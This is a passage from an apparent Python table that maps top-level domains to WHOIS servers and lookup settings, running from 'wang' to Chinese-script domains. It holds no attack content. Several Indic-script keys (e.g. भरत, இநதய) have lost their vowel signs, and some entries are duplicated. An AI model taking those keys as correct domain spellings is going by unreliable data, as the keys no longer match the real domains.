\"nic.wang\"}\nZZ[\"wanggou\"] = {\"_server\": \"whois.nic.wanggou\", \"extend\": \"com\", \"_test\": \"nic.wanggou\"}\nZZ[\"watches\"] = {\"_server\": \"whois.nic.watches\", \"extend\": \"com\", \"_test\": \"nic.watches\"}\nZZ[\"watch\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"webcam\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.webcam\", \"_test\": \"nic.webcam\"}\nZZ[\"weber\"] = {\"_server\": \"whois.nic.weber\", \"extend\": \"com\", \"_test\": \"nic.weber\"}\nZZ[\"website\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"web.ve\"] = {\"extend\": \"ve\"}\nZZ[\"web.za\"] = {\"extend\": \"za\", \"_server\": \"web-whois.registry.net.za\"}\nZZ[\"wedding\"] = {\"_server\": \"whois.nic.wedding\", \"extend\": \"com\", \"_test\": \"nic.wedding\"}\nZZ[\"wed\"] = {\"_server\": \"whois.nic.wed\", \"extend\": \"com\", \"_test\": \"nic.wed\"}\nZZ[\"weibo\"] = {\"_server\": \"whois.nic.weibo\", \"extend\": \"com\", \"_test\": \"nic.weibo\"}\nZZ[\"whoswho\"] = {\"_server\": \"whois.nic.whoswho\", \"extend\": \"com\", \"_test\": \"nic.whoswho\"}\nZZ[\"wien\"] = {\"_server\": \"whois.nic.wien\", \"extend\": \"com\", \"_test\": \"nic.wien\"}\nZZ[\"wine\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"win\"] = {\"extend\": \"com\"}\nZZ[\"wme\"] = {\"_server\": \"whois.nic.wme\", \"extend\": \"com\", \"_test\": \"nic.wme\"}\nZZ[\"wolterskluwer\"] = {\"_server\": \"whois.nic.wolterskluwer\", \"extend\": \"com\", \"_test\": \"nic.wolterskluwer\"}\nZZ[\"woodside\"] = {\"_server\": \"whois.nic.woodside\", \"extend\": \"com\", \"_test\": \"nic.woodside\"}\nZZ[\"works\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"world\"] = {\"extend\": \"_donuts\", \"_server\": 
\"whois.donuts.co\"}\nZZ[\"wow\"] = {\"_server\": \"whois.nic.wow\", \"extend\": \"com\", \"_test\": \"nic.wow\"}\nZZ[\"wtc\"] = {\"_server\": \"whois.nic.wtc\", \"extend\": \"com\", \"_test\": \"nic.wtc\"}\nZZ[\"wtf\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"xerox\"] = {\"_server\": \"whois.nic.xerox\", \"extend\": \"com\", \"_test\": \"nic.xerox\"}\nZZ[\"xfinity\"] = {\"_server\": \"whois.nic.xfinity\", \"extend\": \"com\", \"_test\": \"nic.xfinity\"}\nZZ[\"xihuan\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xin\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.xin\", \"_test\": \"nic.xin\"}\nZZ[\"xn--11b4c3d\"] = {\"_server\": \"whois.nic.xn--11b4c3d\", \"extend\": \"com\", \"_test\": \"nic.xn--11b4c3d\"}\nZZ[\"xn--1qqw23a\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--2scrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--30rr7y\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--3bst00m\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--3ds443g\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--3e0b707e\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"xn--3hcrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--3pxu8k\"] = {\"_server\": \"whois.nic.xn--3pxu8k\", \"extend\": \"com\", \"_test\": \"nic.xn--3pxu8k\"}\nZZ[\"xn--42c2d9a\"] = {\"_server\": \"whois.nic.xn--42c2d9a\", \"extend\": \"com\", \"_test\": \"nic.xn--42c2d9a\"}\nZZ[\"xn--45br5cyl\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--45brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--45q11c\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--4gbrim\"] = {\"_server\": \"whois.nic.xn--4gbrim\", \"extend\": \"com\", \"_test\": \"nic.xn--4gbrim\"}\nZZ[\"xn--55qx5d\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--5su34j936bgsg\"] = {\"_server\": \"whois.nic.xn--5su34j936bgsg\", \"extend\": \"com\", \"_test\": \"nic.xn--5su34j936bgsg\"}\nZZ[\"xn--5tzm5g\"] = {\"_server\": \"whois.nic.xn--5tzm5g\", \"extend\": \"com\", \"_test\": \"nic.xn--5tzm5g\"}\nZZ[\"xn--6frz82g\"] = {\"_server\": \"whois.nic.xn--6frz82g\", \"extend\": \"com\", \"_test\": \"nic.xn--6frz82g\"}\nZZ[\"xn--6qq986b3xl\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--80adxhks\"] = {\"_server\": \"whois.nic.xn--80adxhks\", \"extend\": \"com\", \"_test\": \"nic.xn--80adxhks\"}\nZZ[\"xn--80aqecdr1a\"] = {\"_server\": \"whois.nic.xn--80aqecdr1a\", \"extend\": \"com\", \"_test\": \"nic.xn--80aqecdr1a\"}\nZZ[\"xn--80asehdb\"] = {\"extend\": \"com\"}\nZZ[\"xn--80asehdb\"] = {\"_server\": \"whois.nic.xn--80asehdb\", \"extend\": \"com\", \"_test\": \"nic.xn--80asehdb\"}\nZZ[\"xn--80aswg\"] = {\"_server\": \"whois.nic.xn--80aswg\", \"extend\": \"com\", \"_test\": \"nic.xn--80aswg\"}\nZZ[\"xn--8y0a063a\"] = {\"_server\": \"whois.nic.xn--8y0a063a\", \"extend\": \"com\", \"_test\": \"nic.xn--8y0a063a\"}\nZZ[\"xn--9dbq2a\"] = {\"_server\": \"whois.nic.xn--9dbq2a\", \"extend\": \"com\", \"_test\": \"nic.xn--9dbq2a\"}\nZZ[\"xn--9et52u\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--9krt00a\"] = {\"_server\": \"whois.nic.xn--9krt00a\", \"extend\": \"com\", \"_test\": \"nic.xn--9krt00a\"}\nZZ[\"xn--b4w605ferd\"] = {\"_server\": 
\"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"xn--c1avg\"] = {\"_server\": \"whois.nic.xn--c1avg\", \"extend\": \"com\", \"_test\": \"nic.xn--c1avg\"}\nZZ[\"xn--c2br7g\"] = {\"_server\": \"whois.nic.xn--c2br7g\", \"extend\": \"com\", \"_test\": \"nic.xn--c2br7g\"}\nZZ[\"xn--cckwcxetd\"] = {\"_server\": \"whois.nic.xn--cckwcxetd\", \"extend\": \"com\", \"_test\": \"nic.xn--cckwcxetd\"}\nZZ[\"xn--cg4bki\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"xn--clchc0ea0b2g2a9gcd\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"xn--czrs0t\"] = {\"_server\": \"whois.nic.xn--czrs0t\", \"extend\": \"com\", \"_test\": \"nic.xn--czrs0t\"}\nZZ[\"xn--czru2d\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--d1alf\"] = {\"_server\": \"whois.marnet.mk\", \"extend\": \"mk\"}\nZZ[\"xn--e1a4c\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"xn--efvy88h\"] = {\"_server\": \"whois.nic.xn--efvy88h\", \"extend\": \"com\", \"_test\": \"nic.xn--efvy88h\"}\nZZ[\"xn--fhbei\"] = {\"_server\": \"whois.nic.xn--fhbei\", \"extend\": \"com\", \"_test\": \"nic.xn--fhbei\"}\nZZ[\"xn--fiq228c5hs\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--fiq64b\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"xn--fiqs8s\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"com\"}\nZZ[\"xn--fiqz9s\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"com\"}\nZZ[\"xn--fjq720a\"] = {\"_server\": \"whois.nic.xn--fjq720a\", \"extend\": \"com\", \"_test\": \"nic.xn--fjq720a\"}\nZZ[\"xn--flw351e\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--fpcrj9c3d\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--fzys8d69uvgm\"] = {\"_server\": \"whois.nic.xn--fzys8d69uvgm\", \"extend\": \"com\", \"_test\": \"nic.xn--fzys8d69uvgm\"}\nZZ[\"xn--gecrj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2breg3eve\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2brj9c8c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--h2brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--hxt814e\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"xn--i1b6b1a6a2e\"] = {\"_server\": \"whois.nic.xn--i1b6b1a6a2e\", \"extend\": \"com\", \"_test\": \"nic.xn--i1b6b1a6a2e\"}\nZZ[\"xn--io0a7i\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--j1aef\"] = {\"_server\": \"whois.nic.xn--j1aef\", \"extend\": \"com\", \"_test\": \"nic.xn--j1aef\"}\nZZ[\"xn--j6w193g\"] = {\"_server\": \"whois.hkirc.hk\", \"extend\": \"hk\", \"_test\": \"hkirc.hk\"}\nZZ[\"xn--jlq480n2rg\"] = {\"_server\": \"whois.nic.xn--jlq480n2rg\", \"extend\": \"com\", \"_test\": \"nic.xn--jlq480n2rg\"}\nZZ[\"xn--kcrx77d1x4a\"] = {\"_server\": \"whois.nic.xn--kcrx77d1x4a\", \"extend\": \"com\", \"_test\": \"nic.xn--kcrx77d1x4a\"}\nZZ[\"xn--kprw13d\"] = {\"extend\": \"tw\", \"_test\": \"google.xn--kprw13d\"}\nZZ[\"xn--kpry57d\"] = {\"extend\": \"tw\", \"_test\": \"google.xn--kpry57d\"}\nZZ[\"xn--kput3i\"] = {\"_server\": \"whois.nic.xn--kput3i\", \"extend\": \"com\", \"_test\": \"nic.xn--kput3i\"}\nZZ[\"xn--mgb9awbf\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"om\"}\nZZ[\"xn--mgba7c0bbn0a\"] = {\"_server\": \"whois.nic.xn--mgba7c0bbn0a\", \"extend\": \"com\", \"_test\": \"nic.xn--mgba7c0bbn0a\"}\nZZ[\"xn--mgbaakc7dvf\"] = {\"extend\": \"_centralnic\", 
\"_server\": \"whois.centralnic.com\"}\nZZ[\"xn--mgbab2bd\"] = {\"_server\": \"whois.nic.xn--mgbab2bd\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbab2bd\"}\nZZ[\"xn--mgbah1a3hjkrd\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"mr\"}\nZZ[\"xn--mgbbh1a71e\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbbh1a\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbca7dzdo\"] = {\"_server\": \"whois.nic.xn--mgbca7dzdo\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbca7dzdo\"}\nZZ[\"xn--mgbgu82a\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--mgbi4ecexp\"] = {\"_server\": \"whois.nic.xn--mgbi4ecexp\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbi4ecexp\"}\nZZ[\"xn--mgbt3dhd\"] = {\"_server\": \"whois.nic.xn--mgbt3dhd\", \"extend\": \"com\", \"_test\": \"nic.xn--mgbt3dhd\"}\nZZ[\"xn--mix891f\"] = {\"_server\": \"whois.monic.mo\", \"extend\": \"mo\"}\nZZ[\"xn--mk1bu44c\"] = {\"_server\": \"whois.nic.xn--mk1bu44c\", \"extend\": \"com\", \"_test\": \"nic.xn--mk1bu44c\"}\nZZ[\"xn--mxtq1m\"] = {\"_server\": \"whois.nic.xn--mxtq1m\", \"extend\": \"com\", \"_test\": \"nic.xn--mxtq1m\"}\nZZ[\"xn--ngbc5azd\"] = {\"_server\": \"whois.nic.xn--ngbc5azd\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbc5azd\"}\nZZ[\"xn--ngbe9e0a\"] = {\"_server\": \"whois.nic.xn--ngbe9e0a\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbe9e0a\"}\nZZ[\"xn--ngbrx\"] = {\"_server\": \"whois.nic.xn--ngbrx\", \"extend\": \"com\", \"_test\": \"nic.xn--ngbrx\"}\nZZ[\"xn--nqv7fs00ema\"] = {\"_server\": \"whois.nic.xn--nqv7fs00ema\", \"extend\": \"com\", \"_test\": \"nic.xn--nqv7fs00ema\"}\nZZ[\"xn--nqv7f\"] = {\"_server\": \"whois.nic.xn--nqv7f\", \"extend\": \"com\", \"_test\": \"nic.xn--nqv7f\"}\nZZ[\"xn--o3cw4h\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\"}\nZZ[\"xn--ogbpf8fl\"] = {\"_server\": \"whois.tld.sy\", \"extend\": \"sy\", \"_test\": \"tld.sy\"}\nZZ[\"xn--p1acf\"] = {\"extend\": \"com\"}\nZZ[\"xn--p1ai\"] = {\"extend\": \"ru\"}\nZZ[\"xn--pssy2u\"] = {\"_server\": \"whois.nic.xn--pssy2u\", \"extend\": \"com\", \"_test\": \"nic.xn--pssy2u\"}\nZZ[\"xn--q9jyb4c\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--qcka1pmc\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--qxa6a\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"xn--rvc1e0am3e\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--s9brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--ses554g\"] = {\"_server\": \"whois.nic.xn--ses554g\", \"extend\": \"com\", \"_test\": \"nic.xn--ses554g\"}\nZZ[\"xn--t60b56a\"] = {\"_server\": \"whois.nic.xn--t60b56a\", \"extend\": \"com\", \"_test\": \"nic.xn--t60b56a\"}\nZZ[\"xn--tckwe\"] = {\"_server\": \"whois.nic.xn--tckwe\", \"extend\": \"com\", \"_test\": \"nic.xn--tckwe\"}\nZZ[\"xn--tiq49xqyj\"] = {\"_server\": \"whois.nic.xn--tiq49xqyj\", \"extend\": \"com\", \"_test\": \"nic.xn--tiq49xqyj\"}\nZZ[\"xn--unup4y\"] = {\"_server\": \"whois.nic.xn--unup4y\", \"extend\": \"com\", \"_test\": \"nic.xn--unup4y\"}\nZZ[\"xn--vermgensberater-ctb\"] = {\"_server\": \"whois.nic.xn--vermgensberater-ctb\", \"extend\": \"com\", \"_test\": \"nic.xn--vermgensberater-ctb\"}\nZZ[\"xn--vermgensberatung-pwb\"] = {\"_server\": \"whois.nic.xn--vermgensberatung-pwb\", \"extend\": \"com\", \"_test\": \"nic.xn--vermgensberatung-pwb\"}\nZZ[\"xn--vhquv\"] = {\"_server\": \"whois.nic.xn--vhquv\", \"extend\": \"com\", \"_test\": 
\"nic.xn--vhquv\"}\nZZ[\"xn--vuq861b\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--w4r85el8fhu5dnra\"] = {\"_server\": \"whois.nic.xn--w4r85el8fhu5dnra\", \"extend\": \"com\", \"_test\": \"nic.xn--w4r85el8fhu5dnra\"}\nZZ[\"xn--w4rs40l\"] = {\"_server\": \"whois.nic.xn--w4rs40l\", \"extend\": \"com\", \"_test\": \"nic.xn--w4rs40l\"}\nZZ[\"xn--wgbl6a\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"qa\", \"_test\": \"registry.qa\"}\nZZ[\"xn--xhq521b\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--xkc2dl3a5ee0h\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--yfro4i67o\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"xxx\"] = {\"_server\": \"whois.nic.xxx\", \"extend\": \"com\", \"_test\": \"nic.xxx\"}\nZZ[\"xyz\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.nic.xyz\", \"_test\": \"nic.xyz\"}\nZZ[\"yachts\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"yamaxun\"] = {\"_server\": \"whois.nic.yamaxun\", \"extend\": \"com\", \"_test\": \"nic.yamaxun\"}\nZZ[\"ye\"] = {\"extend\": \"com\", \"_server\": \"whois.y.net.ye\", \"_test\": \"net.ye\"}\nZZ[\"yodobashi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"yoga\"] = {\"_server\": \"whois.nic.yoga\", \"extend\": \"com\", \"_test\": \"nic.yoga\"}\nZZ[\"yokohama\"] = {\"_server\": \"whois.nic.yokohama\", \"extend\": \"com\", \"_test\": \"nic.yokohama\"}\nZZ[\"you\"] = {\"_server\": \"whois.nic.you\", \"extend\": \"com\", \"_test\": \"nic.you\"}\nZZ[\"youtube\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"yt\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.yt\", \"_test\": \"nic.yt\"}\nZZ[\"yun\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"za\"] = {\"extend\": \"com\"}\nZZ[\"zappos\"] = {\"_server\": \"whois.nic.zappos\", \"extend\": \"com\", \"_test\": \"nic.zappos\"}\nZZ[\"zara\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"zip\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.zip\", \"_test\": \"nic.zip\"}\nZZ[\"zm\"] = {\"extend\": \"com\"}\nZZ[\"zone\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"zuerich\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"zw\"] = {\"extend\": \"_privateReg\"} # Zimbabwe\nZZ[\"ευ\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"ею\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"католик\"] = {\"_server\": \"whois.nic.xn--80aqecdr1a\", \"extend\": \"xn--80aqecdr1a\"}\nZZ[\"ком\"] = {\"_server\": \"whois.nic.xn--j1aef\", \"extend\": \"xn--j1aef\"}\nZZ[\"мкд\"] = {\"_server\": \"whois.marnet.mk\", \"extend\": \"mk\"}\nZZ[\"москва\"] = {\"_server\": \"whois.nic.xn--80adxhks\", \"extend\": \"xn--80adxhks\"}\nZZ[\"онлайн\"] = {\"extend\": \"com\"}\nZZ[\"орг\"] = {\"_server\": \"whois.nic.xn--c1avg\", \"extend\": \"xn--c1avg\"}\nZZ[\"рус\"] = {\"extend\": \"com\"}\nZZ[\"рф\"] = {\"extend\": \"ru\"}\nZZ[\"сайт\"] = {\"_server\": \"whois.nic.xn--80aswg\", \"extend\": \"xn--80aswg\"}\nZZ[\"קום\"] = {\"_server\": \"whois.nic.xn--9dbq2a\", \"extend\": \"xn--9dbq2a\"}\nZZ[\"ابوظبي\"] = {\"_server\": \"whois.nic.xn--mgbca7dzdo\", \"extend\": \"xn--mgbca7dzdo\"}\nZZ[\"اتصالات\"] = {\"_server\": \"whois.centralnic.com\", \"extend\": \"_centralnic\"}\nZZ[\"العليان\"] = {\"_server\": \"whois.nic.xn--mgba7c0bbn0a\", \"extend\": \"xn--mgba7c0bbn0a\"}\nZZ[\"بارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": 
\"com\"}\nZZ[\"بازار\"] = {\"_server\": \"whois.nic.xn--mgbab2bd\", \"extend\": \"xn--mgbab2bd\"}\nZZ[\"بھارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"بيتك\"] = {\"_server\": \"whois.nic.xn--ngbe9e0a\", \"extend\": \"xn--ngbe9e0a\"}\nZZ[\"ڀارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"سورية\"] = {\"_server\": \"whois.tld.sy\", \"extend\": \"sy\"}\nZZ[\"شبكة\"] = {\"_server\": \"whois.nic.xn--ngbc5azd\", \"extend\": \"xn--ngbc5azd\"}\nZZ[\"عرب\"] = {\"_server\": \"whois.nic.xn--ngbrx\", \"extend\": \"xn--ngbrx\"}\nZZ[\"عمان\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"om\"}\nZZ[\"قطر\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"qa\"}\nZZ[\"كاثوليك\"] = {\"_server\": \"whois.nic.xn--mgbi4ecexp\", \"extend\": \"xn--mgbi4ecexp\"}\nZZ[\"كوم\"] = {\"_server\": \"whois.nic.xn--fhbei\", \"extend\": \"xn--fhbei\"}\nZZ[\"موريتانيا\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"mr\"}\nZZ[\"موقع\"] = {\"_server\": \"whois.nic.xn--4gbrim\", \"extend\": \"xn--4gbrim\"}\nZZ[\"همراه\"] = {\"_server\": \"whois.nic.xn--mgbt3dhd\", \"extend\": \"xn--mgbt3dhd\"}\nZZ[\"कम\"] = {\"_server\": \"whois.nic.xn--11b4c3d\", \"extend\": \"xn--11b4c3d\"}\nZZ[\"नट\"] = {\"_server\": \"whois.nic.xn--c2br7g\", \"extend\": \"xn--c2br7g\"}\nZZ[\"भरत\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"भरत\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"भरतम\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"सगठन\"] = {\"_server\": \"whois.nic.xn--i1b6b1a6a2e\", \"extend\": \"xn--i1b6b1a6a2e\"}\nZZ[\"ভরত\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ভৰত\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ਭਰਤ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ભરત\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ଭରତ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"இநதய\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"சஙகபபர\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"భరత\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ಭರತ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ഭരത\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"คอม\"] = {\"_server\": \"whois.nic.xn--42c2d9a\", \"extend\": \"xn--42c2d9a\"} #\nZZ[\"ไทย\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\"}\nZZ[\"アマゾン\"] = {\"_server\": \"whois.nic.xn--cckwcxetd\", \"extend\": \"xn--cckwcxetd\"}\nZZ[\"グーグル\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"コム\"] = {\"_server\": \"whois.nic.xn--tckwe\", \"extend\": \"xn--tckwe\"}\nZZ[\"みんな\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"中信\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"中国\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"xn--fiqs8s\"}\nZZ[\"中國\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"xn--fiqs8s\"}\nZZ[\"中文网\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"亚马逊\"] = {\"_server\": \"whois.nic.xn--jlq480n2rg\", \"extend\": \"xn--jlq480n2rg\"}\nZZ[\"企业\"] = {\"_server\": \"whois.nic.xn--vhquv\", \"extend\": \"xn--vhquv\"}\nZZ[\"佛山\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"信息\"] = {\"_server\": \"whois.teleinfo.cn\", \"extend\": \"_teleinfo\"}\nZZ[\"八卦\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": 
None}\nZZ[\"公司\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"台湾\"] = {\"_server\": \"whois.twnic.net.tw\", \"extend\": \"tw\", \"_test\": \"google.台湾\"}\nZZ[\"台灣\"] = {\"_server\": \"whois.twnic.net.tw\", \"extend\": \"tw\", \"_test\": \"google.台灣\"}\nZZ[\"商城\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"商店\"] = {\"_server\": \"whois.nic.xn--czrs0t\", \"extend\": \"xn--czrs0t\"}\nZZ[\"嘉里\"] = {\"_server\": \"whois.nic.xn--w4rs40l\", \"extend\": \"xn--w4rs40l\"}\nZZ[\"嘉里大酒店\"] = {\"_server\": \"whois.nic.xn--w4r85el8fhu5dnra\", \"extend\": \"xn--w4r85el8fhu5dnra\"}\nZZ[\"在线\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"大拿\"] = {\"_server\": \"whois.nic.xn--pssy2u\", \"extend\": \"xn--pssy2u\"}\nZZ[\"天主教\"] = {\"_server\": \"whois.nic.xn--tiq49xqyj\", \"extend\": \"xn--tiq49xqyj\"}\nZZ[\"娱乐\"] = {\"_server\": \"whois.nic.xn--fjq720a\", \"extend\": \"xn--fjq720a\"}\nZZ[\"广东\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"微博\"] = {\"_server\": \"whois.nic.xn--9krt00a\", \"extend\": \"xn--9krt00a\"}\nZZ[\"慈善\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"我爱你\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"手机\"] = {\"_server\": \"whois.nic.xn--kput3i\", \"extend\": \"xn--kput3i\"}\nZZ[\"政府\"] = {\"_server\": \"whois.nic.xn--mxtq1m\", \"extend\": \"xn--mxtq1m\"}\nZZ[\"新加坡\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"新闻\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"时尚\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"机构\"] = {\"_server\": \"whois.nic.xn--nqv7f\", \"extend\": \"xn--nqv7f\"}\nZZ[\"淡马锡\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"游戏\"] = {\"_server\": \"whois.nic.xn--unup4y\", \"extend\": \"xn--unup4y\"}\nZZ[\"澳門\"] = {\"_server\": \"whois.monic.mo\", \"extend\": \"mo\"}\nZZ[\"点看\"] = {\"_server\": \"whois.nic.xn--3pxu8k\", \"extend\": \"xn--3pxu8k\"}\nZZ[\"移动\"] = {\"_server\": \"whois.nic.xn--6frz82g\", \"extend\": \"xn--6frz82g\"}\nZZ[\"组织机构\"] = {\"_server\": \"whois.nic.xn--nqv7fs00ema\", \"extend\": \"xn--nqv7fs00ema\"}\nZZ[\"网址\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"网店\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"网站\"] = {\"_server\": \"whois.nic.xn--5tzm5g\", \"extend\": \"xn--5tzm5g\"}\nZZ[\"网络\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\", \"_test\": \"ngtld.cn\"}\nZZ[\"联通\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"谷歌\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"集团\"] = {\"_server\": 